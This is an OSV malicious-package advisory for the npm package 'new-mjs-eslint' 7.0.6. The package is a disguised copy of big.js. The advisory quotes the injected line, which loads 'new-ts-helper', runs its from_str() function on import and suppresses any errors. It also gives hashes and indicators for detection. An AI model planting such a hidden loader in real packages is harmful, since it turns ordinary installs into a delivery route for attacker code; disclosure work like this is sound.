MAL-2026-6226

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-mjs-eslint/MAL-2026-6226.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6226

Published

2026-06-19T14:24:05Z

Modified

2026-06-19T15:47:26.788269856Z

Summary

Malicious code in new-mjs-eslint (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e)

Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T14:24:05Z",
            "versions": [
                "7.0.6"
            ],
            "id": "IN-MAL-2026-007070",
            "import_time": "2026-06-19T15:41:55.179524401Z"
        }
    ]
}

References

https://www.npmjs.com/package/new-mjs-eslint/v/7.0.6

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / new-mjs-eslint

Package

Name: new-mjs-eslint; View open source insights on deps.dev
Purl: pkg:npm/new-mjs-eslint

Affected ranges

Affected versions

7.*

7.0.6

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-mjs-eslint/MAL-2026-6226.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "68a805f0682bec7d0697485749fa40515a3fd89cdb64e63839cd22be599296cd",
            "tlsh": "cec2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b5fdc",
            "path": "big.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-23y4OVElLFS8BawlEbbgWXEbAByc/8bfduA2SjwI1yqeE6wzWnGokIrZDH4orDlx0k/6b1zeFQ5OFNvLZd+04Q==",
                "sha1": "d8e6d1171fcedf90b4abbf63b1b018399ebcdaba"
            },
            "filename": "new-mjs-eslint-7.0.6.tgz"
        }
    ]
}